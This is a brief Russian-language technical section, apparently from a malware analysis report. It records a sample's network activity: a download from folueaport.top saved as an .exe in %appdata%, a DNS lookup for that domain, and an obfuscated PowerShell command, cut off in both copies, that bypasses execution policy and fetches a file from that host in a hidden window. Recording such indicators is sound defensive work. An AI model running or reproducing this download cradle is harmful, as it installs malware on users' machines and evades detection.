Техническая информация
- http://folueaport.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^OweR^s^h^ell^.exe ^-eX^EC^utIoNP^OL^IC^y^ by^p^A^s^S^ -nOPr^ofI^Le -^WinDoWST^Y^lE HiDdeN (n^EW^-o^bjE^Ct^ ^S^ySTEM.nEt^.^W^ebCl^iENT).do^WNLoad^f^ilE^(^'http://folueaport.top/re...
- DNS ASK fo###aport.top
- '<SYSTEM32>\cmd.exe' /c "P^OweR^s^h^ell^.exe ^-eX^EC^utIoNP^OL^IC^y^ by^p^A^s^S^ -nOPr^ofI^Le -^WinDoWST^Y^lE HiDdeN (n^EW^-o^bjE^Ct^ ^S^ySTEM.nEt^.^W^ebCl^iENT).do^WNLoad^f^ilE^(^'http://folueaport.top/re...' (со скрытым окном)